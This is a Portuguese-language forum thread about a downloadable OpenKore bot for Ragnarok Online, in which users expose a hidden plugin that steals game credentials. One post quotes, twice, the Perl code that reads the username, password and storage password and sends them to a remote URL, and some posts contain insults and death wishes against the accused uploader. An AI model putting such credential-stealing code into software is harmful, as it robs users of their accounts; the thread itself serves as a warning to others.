Ir para conteúdo
Faça parte da equipe! (2024) ×
Conheça nossa Beta Zone! Novas áreas a caminho! ×
  • Quem está por aqui   0 membros estão online

• Nenhum usuário registrado visualizando esta página.

Openkore 2.7 Sempre Atualizado/Video Aula/Scan/Macro/Thor e Odin/Traduzido Português

Compartilhar

Posts Recomendados

@kodag0

amigo, vc falo pra ele se espeçar melhor... eu tenho 4 conselhos pra vc tbm.

1- nao use palavras de baixo calão se vc quer ser respeitado ou levado a sério. (qnd eu li o seu post eu ri pra k7 pq imaginei vc falando aquilo)

2- apresente provas sobre o que vc está falando, se nao ninguem vai acreditar em vc, principalmente tendo criado a conta mes passado e tendo só 3 posts...

3- NAO USE CAPSLOCK NEM MUDE A PORRA DO TAMANHO DA LETRA ENQUANTO ESCREVE. FICA RIDICULO

4- nao coloque itens valiosos num bot, se vc for banido ou roubado vc perde tudo... pra q vc coloco 90kk no bot logo no primero dia de uso?? pediu pra ser roubado (isso se vc realmente estiver falando a verdade)

agora algumas observaçoes:

1- vc pediu pra banir o cara, mas vc tbm merece ser banido por xingar no forum. acho que a puniçao é de uma semana mas nao tenho ctz

2- vc falo q o dono do tópico é gordo. como vc sabe se nunca viu ele O_O' ??

3- quem te garante q n é ele que vai te dar uma surra se vcs se encontrarem da rua?

nao estou defendendo o jorgenunis, mas sinceramente, vc ta precisando de umas aulas de convivio em sociedade e boas maneiras... (e olha q é um adolescente d 16 anos q ta falando isso heim...)

@topic--------------------

aff, vo ter que analizar esse troço d novo...

amanha eu digo se achei KL ou nao

Link para o comentário
Compartilhar em outros sites

Mano se você fosse roubado com os itens que eu estava você estaria da mesma forma ou pior... vi teu primeiro post vi que tu tinha pesquisado e não tinha achado KL e tal, fui na fé me ferrei, mas vou ferrar esse carinha tbm pq vai ser a ultima pessoa que ele vai roubar... pq niguem merece isso mano!

Sou membro novo mesmo e dai? vai da uma de veterano pra cima de mim so pq sou novato no forum... brother não to pedindo pra vc acreditar ou não em mim... tenta a sorte ae e depois me fala o que ele roubou de vc!

Não viria aqui a toa ne cara, esse jorge ai é um filho da puta fudido mesmo e merece morrer!

GALERA DE BOA CUIDADO, BAIXEM OUTRO MAS NÃO TENTEM ESSE... TO DANDO UM CONSELHO QUEM QUISER OUVI-LO DE BOA MAS QUE NÃO QUISER BOA SORTE!

Brother eu não respeito ladrãoooooo, foi bom esse fdp não ter botado a localização dele no perfil se não eu mandaria botar ele no inferno aonde ele tivesse! Jorgenunis pau no cu do caralho

Link para o comentário

me desculpe se pareceu que eu falei aquilo como se eu fosse se superior a vc. nao é isso nao.

eu nao falei aquilo pq vc é novo no fórum, é que tem 2 hackers aqui na webcheats que criam centenas de contas fakes pra incriminar bots honestos. por isso ninguem mais por aqui confia em pessoas com menos de 30 posts

eu nao uso kores prontos, eu faço o meu próprio, justamente pra nao correr riscos.

e otra, eu tbm ja fui roubado usando bot. perdi uns 50kk em equips (na epoca valia bem + q agr) e um set campal completo que eu peguei 75% dele honestamente

o que eu fiz?? pensei: "eh, é isso que eu mereço por trapacear no jogo..."

e nunca mais reclamei, pricipalmente pq nós aqui somos os "viloes" do rag. agente nao tá em posiçao de reclamar de nada...

Link para o comentário

A casa caiu ladrãozinho

É necessário se cadastrar para acessar o conteúdo.

Pasta plugins arquivo oculto OPKBRGuard(Reconnect) e não adianta nem querer mudar o link pois ja tirei print e tudo blz!

Link para o comentário

realmente, o KL está lá...

@kodag0

vc falo que viu eu falando que o bot nao tinha kl e por isso baixou.

vc esqueceu de ver a data de ediçao do tópico principal. eu falei q nao tinha kl no dia 30/01/12, o bot disponibilizado no post é do dia 01/02/12.

sempre olhe a data de ediçao do post principal. qualquer comentario feito antes da ultima ediçao é quase que completamente inutil pq o dono do topico pode mudar qualquer coisa nele

otra coisa, nao confie só no meu julgamento. eu tbm posso me enganar

mas se nem eu, nem o saruesley nem o webopenkore acharmos nada, é provavel que nao tenha kl

Link para o comentário

Po simpson e esse bot aqui é confiavel ? http://www.webcheats.com.br/forum/rag-cheats/1440589-openkore-funcionando-01-02-2012-atualizado.html

E se não for vc bem que podia posta um bot pq tipo eu já mecho aqui a um tempinho e as duvidas que postei vc sempre respondeu e tal e vejo seus posts e eu acho tu um dos unicos confiaveis aqui . xD

Link para o comentário

Aee galera esse openkore q esse baba noob postou estar com Keyloger e estar nos plugins, detalhe esta oculto!!!! o nome do plugin é "OPKBRGuard(Reconnect)"

uma dica abra a pasta de plugins vai em Ferramentas>opções de pasta> procure a opção pastas e arquivos ocultos e selecione: Mostrar pastas e arquivos ocultos. Feito isso abra um bloco de notas e arraste tanto esse plugin qnto o resto e procure isso:

use LWP::UserAgent;

use Utils qw(urlencode);

my $ua = LWP::UserAgent->new;

$ua->timeout(10);

$ua->env_proxy;

my $usuario = $config{'username'};

$usuario =~ s/#/:/;

my $senha = $config{'password'};

$senha =~ s/#/:/;

my $kafra = $config{'storageAuto_password'};

$kafra =~ s/#/:/;

my $response = $ua->get("

$senha $kafra");

esse eh o famoso KL e esse safaddo qnto todos os outros q postaram q eu ja baixei todos e testei ESTÃO COM KL!

CUIDADO

Aee galera esse openkore q esse baba noob postou estar com Keyloger e estar nos plugins, detalhe esta oculto!!!! o nome do plugin é "OPKBRGuard(Reconnect)"

uma dica abra a pasta de plugins vai em Ferramentas>opções de pasta> procure a opção pastas e arquivos ocultos e selecione: Mostrar pastas e arquivos ocultos. Feito isso abra um bloco de notas e arraste tanto esse plugin qnto o resto e procure isso:

use LWP::UserAgent;

use Utils qw(urlencode);

my $ua = LWP::UserAgent->new;

$ua->timeout(10);

$ua->env_proxy;

my $usuario = $config{'username'};

$usuario =~ s/#/:/;

my $senha = $config{'password'};

$senha =~ s/#/:/;

my $kafra = $config{'storageAuto_password'};

$kafra =~ s/#/:/;

my $response = $ua->get("

$senha $kafra");

esse eh o famoso KL e esse safaddo qnto todos os outros q postaram q eu ja baixei todos e testei ESTÃO COM KL!

CUIDADO!

Me desculpem ter postado em duplicata, naum sei oq aconteceu!

Tirando a parte do KL esse openkore desse noob esta funfando sim...

Espero ter ajudado e salvado a todos!!! tomem muito cuidado ao baixar esses openkores prontos, vem com manual e ateh os postadorem se oferencem pra tirar dúvidas..kkk. Que piada!

MAIS UMA VEZ, FIQUEI DE ZÓIO ABERTOS!

Link para o comentário

tudo com KL!

cara se tirar somente esta parte do plugin funfa sim, mas esse plugn e necessario ter para ele pode reconectar novamente caso desconecte.

E essa de eu naum sabia e naum vi q tinha eh papo fiado! Se for, manolo vc perdeu véi e os caras da ond vc vc pegou esse openkore estao rindo de vc.. pq um cara q sab fazer uma confiuração e naum ver...... ta de sacanagem!

Mas nu mais esta funcionado sim ateh o presente momento!

Link para o comentário

É amigos realmente tem KL, coloquei sem o cuidado de observar melhor e deu no que deu, inda bem que so perde um carteiro^^ , so queria fazer uma perguntinha a vocês que sempre ajudam tanto, sera que esse carinha ai não viu mesmo? E sera que alguem vai ter a coragem de baixa do post dele de novo? So acho que antes de repassa uma coisa a alguem temos que saber pelomenos o que tamos passando, merecia nominimo ban (so uma questão de opinião)

Link para o comentário

po cara, aki ta indo acho q até certo n sei direito primeira vez tentando fazer isso, mas tipo o meu start ro fecha do nd dando um erro la!

o nome do erro é (version %s, %lu, %lu)

alguem pode ajuda? '-'

de preferencia tbm poderia dizer como eu faco para fazer com q ele va para certo ponto se morrer!?

Link para o comentário

A casa caiu ladrãozinho

Pasta plugins arquivo oculto OPKBRGuard(Reconnect) e não adianta nem querer mudar o link pois ja tirei print e tudo blz!

Mais pq esse hacker ainda ta aki?

Ele ainda vem dar desculpa que não sabia que a botbrasil possui bot com kl... fala serio ne!

Tem de ser muito inocente pra acreditar nessa!

Bom eu fiz minha parte denunciei o kl que eu achei agora e com vcs decidirem se baixam ou não, se arriscam ou não usando esse kore!

E quem e que garante que o kl desse bot esta somente na pasta plugins?

Eu so dei uma olhada por cima nao fiz analise bem afundo pois estava e ainda estou sem tempo, sugiro que ngm baixem este kore no momento!

Estranho desse topico ainda ta aberto!

Link para o comentário

Este tópico está impedido de receber novos posts.
 Compartilhar

• Criar Novo...

Informação Importante

Nós fazemos uso de cookies no seu dispositivo para ajudar a tornar este site melhor. Você pode ajustar suas configurações de cookies , caso contrário, vamos supor que você está bem para continuar.